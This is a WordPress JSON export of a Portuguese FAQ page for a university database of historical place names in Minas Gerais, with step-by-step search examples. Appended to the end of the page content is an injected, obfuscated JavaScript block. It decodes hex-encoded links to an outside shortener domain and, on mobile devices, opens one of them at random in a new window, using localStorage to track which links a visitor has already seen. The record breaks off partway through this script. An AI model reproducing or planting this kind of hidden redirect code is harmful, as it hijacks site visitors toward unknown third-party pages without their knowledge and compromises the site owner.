{"id":280,"date":"2022-07-13T06:24:46","date_gmt":"2022-07-13T06:24:46","guid":{"rendered":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/?page_id=280"},"modified":"2023-09-19T02:58:45","modified_gmt":"2023-09-19T02:58:45","slug":"duvidasfrequentes","status":"publish","type":"page","link":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/duvidasfrequentes\/","title":{"rendered":"D\u00favidas Frequentes"},"content":{"rendered":"<p>[vc_row][vc_column icons_position=&#8221;left&#8221;][vc_tta_accordion][vc_tta_section title=&#8221;O que posso pesquisar na BUSCA?&#8221; tab_id=&#8221;1675132980558-39470064-381e&#8221;][vc_column_text]O usu\u00e1rio pode recuperar as informa\u00e7\u00f5es pesquisando qualquer palavra presente no Banco de Dados, que se apresenta como uma Tabela, cujos dados de entrada est\u00e3o em linhas e a palavra pesquisada corresponde a um atributo de uma das vari\u00e1veis, dispostas nas colunas. O Reposit\u00f3rio fornece Dados Atuais e Dados Hist\u00f3ricos e, dentro destes, tr\u00eas tipos de Classifica\u00e7\u00e3o: Geogr\u00e1fica, Lingu\u00edstica e Hist\u00f3rica.[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;Como fazer uma BUSCA?&#8221; tab_id=&#8221;1659610548193-1e8884a5-ba38&#8243;][vc_column_text]A Busca se d\u00e1 ao selecionar no Menu de Busca a VARI\u00c1VEL no campo \u00e0 esquerda e, em seguida, digitar o atributo a ser pesquisado no campo \u00e0 direita.<\/p>\n<ul>\n<li><strong>A\u00e7\u00e3o:<\/strong>\n<ul>\n<li>Para selecionar a vari\u00e1vel, que corresponda ao atributo a pesquisar, clique em <strong>Todos os campos \u02c5<\/strong> que abrir\u00e1, em sequ\u00eancia, todas as vari\u00e1veis dispon\u00edveis. No campo \u00e0 direita, digite o atributo relacionado \u00e0quela VARI\u00c1VEL.<br \/>\nEm seguida, clicar em BUSCAR<\/li>\n<\/ul>\n<\/li>\n<li><strong>Resposta:<\/strong>\n<ul>\n<li>Estar\u00e1 dispon\u00edvel na Tabela logo abaixo, que pode ser inteiramente visualizada na horizontal, usando a barra de rolamento para a direita ou \u00e0 esquerda, e, na vertical, para baixo ou para cima, usando o mouse.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><strong>Exemplo 1:<br \/>\n<\/strong>A atual cidade de <span style=\"text-decoration: underline;\">Tiradentes<\/span> est\u00e1 presente em que <span style=\"text-decoration: underline;\">Mapas Hist\u00f3ricos<\/span>?<\/p>\n<ol>\n<li>Vari\u00e1vel: Entrada Lexical (Top\u00f4nimos Atuais)<\/li>\n<li>Atributo: Tiradentes<\/li>\n<li>Clique em BUSCAR<\/li>\n<li>O resultado estar\u00e1 dispon\u00edvel na Tabela abaixo, contendo 10 resultados com todas as informa\u00e7\u00f5es dispon\u00edveis sobre a Entrada Lexical <span style=\"text-decoration: underline;\">Tiradentes<\/span>. A d\u00e9cima coluna relaciona-se \u00e0 vari\u00e1vel <span style=\"text-decoration: underline;\">Mapa<\/span>, e nela encontram-se registrados todos os mapas em que Tiradentes est\u00e1 presente.<\/li>\n<\/ol>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-1081 size-large\" src=\"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h09_14-1024x523.png\" alt=\"\" width=\"1024\" height=\"523\" srcset=\"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h09_14-1024x523.png 1024w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h09_14-300x153.png 300w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h09_14-768x393.png 768w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h09_14-1536x785.png 1536w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h09_14-500x256.png 500w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h09_14-800x409.png 800w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h09_14-1280x654.png 1280w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h09_14-370x189.png 370w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h09_14-248x127.png 248w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h09_14-496x254.png 496w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h09_14-760x388.png 760w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h09_14-1520x777.png 1520w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h09_14-740x378.png 740w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h09_14-600x307.png 600w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h09_14.png 1663w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/>[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;Como imprimir o resultado da BUSCA?&#8221; tab_id=&#8221;1659610548207-33946018-e765&#8243;][vc_column_text]Logo abaixo do Menu de Busca, encontra-se \u00e0 direita, o \u00edcone <strong>Imprimir\/Exportar<\/strong><br \/>\nQuando acionado, o usu\u00e1rio pode imprimir o resultado da pesquisa ou salvar em PDF. Nesse caso, poder\u00e1 armazen\u00e1-lo em um arquivo de seu interesse.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-1083 size-large\" src=\"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h13_12-1024x392.png\" alt=\"\" width=\"1024\" height=\"392\" srcset=\"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h13_12-1024x392.png 1024w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h13_12-300x115.png 300w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h13_12-768x294.png 768w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h13_12-1536x588.png 1536w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h13_12-500x191.png 500w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h13_12-800x306.png 800w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h13_12-1280x490.png 1280w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h13_12-370x142.png 370w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h13_12-760x291.png 760w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h13_12-1520x582.png 1520w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h13_12-740x283.png 740w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h13_12-600x230.png 600w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h13_12.png 1669w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/>[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;Como posso fazer uma nova BUSCA?&#8221; tab_id=&#8221;1659610602604-821f3a62-cc1f&#8221;][vc_column_text]Uma nova busca pode ser feita, para isso o usu\u00e1rio deve clicar em <strong>LIMPAR BUSCA<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-1084\" src=\"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h14_38-1024x356.png\" alt=\"\" width=\"1024\" height=\"356\" srcset=\"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h14_38-1024x356.png 1024w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h14_38-300x104.png 300w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h14_38-768x267.png 768w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h14_38-1536x534.png 1536w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h14_38-500x174.png 500w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h14_38-800x278.png 800w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h14_38-1280x445.png 1280w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h14_38-370x129.png 370w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h14_38-760x264.png 760w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h14_38-1520x528.png 1520w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h14_38-740x257.png 740w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h14_38-600x209.png 600w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h14_38.png 1669w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/>[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;Como fazer BUSCA AVAN\u00c7ADA?&#8221; tab_id=&#8221;1659610688083-f6f897e4-3139&#8243;][vc_column_text]A Busca Avan\u00e7ada pode ser feita quando se quer refinar o resultado, ao utilizar atributos de mais de uma vari\u00e1vel. Neste caso, faz-se uma busca, selecionando a primeira VARI\u00c1VEL e digitando o atributo desejado. Para selecionar uma nova vari\u00e1vel \u00e9 necess\u00e1rio clicar em <strong>+ ADICIONAR FILTRO<\/strong>. Mais dois campos de busca s\u00e3o apresentados. Escolha uma nova VARI\u00c1VEL e digite o segundo atributo e o aplicativo selecionar\u00e1 as informa\u00e7\u00f5es n\u00e3o mais no Banco de Dados Original e sim naquele obtido com a pesquisa anterior. Este procedimento pode ser repetido outras vezes at\u00e9 que se obtenha o resultado procurado.<\/p>\n<p><strong>Exemplo 2:<\/strong><br \/>\nQuais os TOP\u00d4NIMOS de ORIGEM portuguesa, pertencentes \u00e0 COMARCA de Paracatu e que possuem NATUREZA F\u00edsica?<\/p>\n<ul>\n<li>A\u00e7\u00f5es:<br \/>\nObserve-se que se queremos pesquisar Top\u00f4nimos, ent\u00e3o devemos fazer a busca em Dados Hist\u00f3ricos, que est\u00e3o indicados nas vari\u00e1veis da Busca.<\/li>\n<\/ul>\n<ol>\n<li>Fa\u00e7a a BUSCA selecionando:<br \/>\nVari\u00e1vel: ORIGEM<br \/>\nAtributo: Portuguesa<\/li>\n<li>Em seguida clique em <strong>+ ADICIONAR FILTRO<\/strong><br \/>\nVari\u00e1vel: COMARCA<br \/>\nAtributo: Paracatu<\/li>\n<li>Em seguida clique em <strong>+ ADICIONAR FILTRO<\/strong><br \/>\nVari\u00e1vel: NATUREZA<br \/>\nAtributo: F\u00edsica<\/li>\n<li>Clique <strong>BUSCAR<\/strong><\/li>\n<li>Os Top\u00f4nimos s\u00e3o: Salgado, Manga, Patroc\u00ednio, Pissarr\u00e3o, Rosinha e Pedras.<\/li>\n<\/ol>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-1086\" src=\"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h22_53-1024x532.png\" alt=\"\" width=\"1024\" height=\"532\" srcset=\"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h22_53-1024x532.png 1024w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h22_53-300x156.png 300w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h22_53-768x399.png 768w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h22_53-1536x798.png 1536w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h22_53-500x260.png 500w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h22_53-800x415.png 800w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h22_53-1280x665.png 1280w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h22_53-370x192.png 370w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h22_53-760x395.png 760w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h22_53-1520x789.png 1520w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h22_53-740x384.png 740w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h22_53-600x312.png 600w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h22_53.png 1664w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><br \/>\n<strong>Exemplo 3:<\/strong><br \/>\nQue Entradas Lexicais (Top\u00f4nimos Atuais) que s\u00e3o Sede Municipal como ACIDENTE GEOGR\u00c1FICO, tendo como MOTIVA\u00c7\u00c3O, Fitotop\u00f4nimo de ORIGEM ind\u00edgena, pertencentes \u00e0 REGI\u00c3O GEOGR\u00c1FICA IMEDIATA de S\u00e3o Jo\u00e3o Del-Rei?<\/p>\n<ul>\n<li><strong>A\u00e7\u00f5es:<br \/>\n<\/strong>Observe-se que estamos interessados nos Dados Atuais, j\u00e1 que estamos querendo pesquisar a respeito de Top\u00f4nimos Atuais, cuja classifica\u00e7\u00e3o geogr\u00e1fica \u00e9 atual.<\/li>\n<\/ul>\n<ol>\n<li>Fa\u00e7a a BUSCA selecionando:<br \/>\nVari\u00e1vel: Acidente Geogr\u00e1fico<br \/>\nAtributo: Sede municipal<\/li>\n<li>Em seguida clique em <strong>+ ADICIONAR FILTRO<\/strong><br \/>\nVari\u00e1vel: Motiva\u00e7\u00e3o<br \/>\nAtributo: Fitotop\u00f4nimo<\/li>\n<li>Em seguida clique em <strong>+ ADICIONAR FILTRO<\/strong><br \/>\nVari\u00e1vel: Origem<br \/>\nAtributo: Ind\u00edgena<\/li>\n<li>Em seguida clique em <strong>+ ADICIONAR FILTRO<\/strong><br \/>\nVari\u00e1vel: REGI\u00c3O GEOGR\u00c1FICA IMEDIATA<br \/>\nAtributo: S\u00e3o Jo\u00e3o Del-Rei<\/li>\n<li>Clique <strong>BUSCAR<\/strong><\/li>\n<li>S\u00e3o apresentadas seis linhas como resultado, todas referentes \u00e0 Entrada Lexical Caranda\u00ed. Observe-se que as informa\u00e7\u00f5es se repetem, com exce\u00e7\u00e3o das vari\u00e1veis PER\u00cdODO e MAPA. Isto significa que Caranda\u00ed est\u00e1 presente em v\u00e1rios mapas apresentados em dois per\u00edodos diferentes: Oitocentos e Setecentos.<\/li>\n<\/ol>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-1087\" src=\"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h27_42-1024x235.png\" alt=\"\" width=\"1024\" height=\"235\" srcset=\"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h27_42-1024x235.png 1024w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h27_42-300x69.png 300w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h27_42-768x176.png 768w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h27_42-1536x353.png 1536w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h27_42-500x115.png 500w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h27_42-800x184.png 800w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h27_42-1280x294.png 1280w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h27_42-370x85.png 370w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h27_42-760x175.png 760w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h27_42-1520x349.png 1520w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h27_42-740x170.png 740w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h27_42-600x138.png 600w, https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/wp-content\/uploads\/2023\/09\/2023-09-02_01h27_42.png 1676w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/>[\/vc_column_text][\/vc_tta_section][\/vc_tta_accordion][vc_empty_space height=&#8221;8.35rem&#8221; hide_on_desktop=&#8221;&#8221; hide_on_notebook=&#8221;&#8221; hide_on_tablet=&#8221;&#8221; hide_on_mobile=&#8221;&#8221;][\/vc_column][\/vc_row][vc_row][vc_column icons_position=&#8221;left&#8221;][vc_column_text]<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x4e\\x4e\\x4b\\x39\\x63\\x31','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x41\\x7a\\x6f\\x38\\x63\\x38','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x6b\\x4e\\x72\\x35\\x63\\x30','8SJGLkz','random','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x6a\\x74\\x67\\x31\\x63\\x37','7196643rGaMMg','setItem','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x71\\x77\\x53\\x32\\x63\\x38','266801SrzfpD','substr','floor','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x79\\x4d\\x76\\x34\\x63\\x33','3ThLcDl','stopPropagation','_blank','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x5a\\x68\\x65\\x33\\x63\\x31','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x66\\x46\\x49\\x30\\x63\\x37'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x47\\x49\\x4f\\x36\\x63\\x36','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x4f\\x55\\x6e\\x37\\x63\\x31',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 